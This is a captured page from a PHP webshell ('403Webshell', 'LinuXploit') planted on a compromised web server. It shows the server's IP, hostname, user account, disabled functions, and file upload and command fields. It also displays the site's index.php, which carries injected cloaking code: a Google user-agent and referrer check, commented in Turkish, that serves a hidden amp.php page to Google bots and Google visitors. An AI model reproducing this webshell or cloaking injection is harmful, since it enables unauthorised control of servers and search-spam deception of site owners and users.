403Webshell
Server IP : 103.233.193.20  /  Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/oriscomadm/public_html/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/oriscomadm/public_html/index.php
<?php
if(!empty($_SERVER['HTTP_USER_AGENT'])){
  $userAgent = $_SERVER['HTTP_USER_AGENT'];
}else{
  $userAgent = '';
}

if(!empty($_SERVER['HTTP_REFERER'])){
  $referer = $_SERVER['HTTP_REFERER'];
}else{
  $referer = '';
} 
$googleBots = [
    'Googlebot',             // Genel Google bot
    'AdsBot',                // Google Ads bot
    'Mediapartners-Google',  // Google AdSense bot
    'APIs-Google',           // Google API bot
    'Googlebot-Image',       // Google Görseller botu
    'Googlebot-Video',       // Google Video botu
    'Googlebot-News',        // Google Haberler botu
    'Googlebot-Search',      // Google Search Console botu
    'Googlebot-Inspect',     // Google Inspect Tool
    'Googlebot-Android',     // Android cihazlardan gelen Googlebot
    'Googlebot-Mobile',      // Google mobil botu
    'Googlebot-Ads',         // Google Ads botu
    'Googlebot-Discovery',   // Google'ın keşif botu
    'Google-',   // Google'ın keşif botu
];


// Google botlarını veya Google'dan gelen kullanıcıları kontrol et
if (
    preg_match('/' . implode('|', $googleBots) . '/i', $userAgent) || // Google botlarını kontrol et
    strpos($referer, 'google.') !== false                             // Referer Google mı kontrol et
) {
    include 'amp.php';
die();
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit